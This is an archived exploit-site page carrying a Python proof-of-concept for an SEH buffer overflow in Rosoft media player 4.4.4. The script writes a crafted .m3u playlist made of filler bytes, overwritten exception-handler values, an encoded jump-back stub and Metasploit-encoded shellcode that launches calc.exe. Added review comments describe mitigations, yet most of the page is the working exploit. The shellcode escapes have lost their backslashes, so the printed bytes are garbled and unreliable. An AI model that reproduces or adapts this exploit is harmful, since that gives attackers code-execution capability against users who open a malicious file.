Rosoft media player 4.4.4 SEH Buffer Overflow
Posted on 15 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Rosoft media player 4.4.4 SEH Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================
Rosoft media player 4.4.4 SEH Buffer Overflow
=============================================
#!/usr/bin/python
# #######################################################################
# Title: Rosoft media player 4.4.4 SEH buffer overflow
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Download: http://www.exploit-db.com/application/14601/
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, exploit-db
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# NOTE(review): the script below writes one oversized .m3u file whose
# contents, per the author's own comments, overwrite the structured exception
# handler record on the stack (nseh/seh below). From a defensive standpoint the
# controls that break this class of bug are SafeSEH (/SAFESEH at link time),
# DEP/NX together with SEHOP at the OS level, and ASLR; the handler address used
# here is "taken from the exe" (author's comment), which presumably means the
# application module was built without those protections — confirm against the
# binary. A parser that enforces a sane maximum entry length would not reach
# the overflow in the first place.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print " -= Exploit for Rosoft media player 4.4.4 (SEH) - dijital1 =- "
# Name of the playlist file this script produces.
outputfile="exploit.m3u"
# Filler that precedes the payload; its length was chosen by the author to
# reach the SEH record (see the payload layout at the bottom).
junk="x41"*3470
# Next-SEH slot and overwritten handler address, as labelled by the author.
nseh="xebx88x90x90" #reverse jump 118 bytes
seh="x49xd4x46x00" # PPR - 0046D449 - Taken from the exe. Not a string copy so
# the null byte works.
# The following shellcode places EIP in ECX and manually adjusts it
# to move execution 775 bytes earlier in the buffer. We need to
# to jump back further than what a short jump will allow hence the following...
#
# Referenced: phrack #62 Article 7 Originally written by Aaron Adams
#
# msfencode -i ./768bck.bin -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 107 (iteration=1)
revjump=("x89xe7xdbxd7xd9x77xf4x5ex56x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4ex39x4ax4ex49x49x43x44"
"x51x34x4cx34x50x59x4bx30x4fx31x44x4ax4ax30x4b"
"x4ex48x4dx4bx4ex48x4dx4bx4ex48x4dx4bx4fx4dx31"
"x41x41")
# NOP sled between the main payload and the reverse jump shellcode
sled="x90"*60
# msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c
# [*] x86/alpha_upper succeeded with size 471 (iteration=1)
# NOTE(review): per the author's command line above, the payload is the usual
# benign proof-of-concept (launch calc.exe), alphanumeric-encoded.
shellcode=("x89xe5xdbxc5xd9x75xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4bx39x45x50"
"x45x50x45x50x43x50x4dx59x4bx55x46x51x49x42x45"
"x34x4cx4bx51x42x46x50x4cx4bx50x52x44x4cx4cx4b"
"x50x52x42x34x4cx4bx43x42x47x58x44x4fx4fx47x50"
"x4ax47x56x46x51x4bx4fx50x31x4fx30x4ex4cx47x4c"
"x43x51x43x4cx45x52x46x4cx47x50x4fx31x48x4fx44"
"x4dx45x51x4fx37x4bx52x4ax50x51x42x50x57x4cx4b"
"x51x42x44x50x4cx4bx51x52x47x4cx43x31x4ex30x4c"
"x4bx51x50x42x58x4dx55x4fx30x42x54x50x4ax43x31"
"x48x50x50x50x4cx4bx47x38x42x38x4cx4bx51x48x47"
"x50x43x31x4ex33x4ax43x47x4cx50x49x4cx4bx50x34"
"x4cx4bx43x31x48x56x50x31x4bx4fx46x51x49x50x4e"
"x4cx4fx31x48x4fx44x4dx43x31x4fx37x46x58x4bx50"
"x43x45x4ax54x44x43x43x4dx4bx48x47x4bx43x4dx47"
"x54x42x55x4dx32x50x58x4cx4bx51x48x51x34x43x31"
"x49x43x45x36x4cx4bx44x4cx50x4bx4cx4bx51x48x45"
"x4cx45x51x48x53x4cx4bx45x54x4cx4bx45x51x48x50"
"x4cx49x50x44x47x54x47x54x51x4bx51x4bx45x31x46"
"x39x51x4ax50x51x4bx4fx4bx50x50x58x51x4fx50x5a"
"x4cx4bx42x32x4ax4bx4dx56x51x4dx43x5ax43x31x4c"
"x4dx4cx45x48x39x45x50x45x50x45x50x46x30x42x48"
"x50x31x4cx4bx42x4fx4bx37x4bx4fx49x45x4fx4bx4a"
"x50x48x35x4fx52x46x36x45x38x49x36x4ax35x4fx4d"
"x4dx4dx4bx4fx4ex35x47x4cx45x56x43x4cx44x4ax4d"
"x50x4bx4bx4bx50x42x55x44x45x4fx4bx47x37x44x53"
"x44x32x42x4fx42x4ax43x30x46x33x4bx4fx49x45x45"
"x33x45x31x42x4cx42x43x46x4ex42x45x44x38x43x55"
"x45x50x45x5ax41x41")
# Payload layout on disk, in order: filler, payload, NOP sled, reverse jump,
# then the two SEH slots last. The whole thing is written as a single line of
# the playlist, which is the kind of anomaly (one multi-kilobyte .m3u entry) a
# content filter or parser length check can reject up front.
payload=junk+shellcode+sled+revjump+nseh+seh
# Plain open/write/close; the file is written in text mode as the author wrote it.
FILE = open(outputfile, "w")
FILE.write(payload)
FILE.close()
print " Exploit written to: " + outputfile + " "
#
<a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-15]</pre><!-- NOTE(review): the analytics loader below injects a third-party script via document.write, choosing the script origin from document.location.protocol; it carries no integrity attribute, so the page cannot verify what it loads. --><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>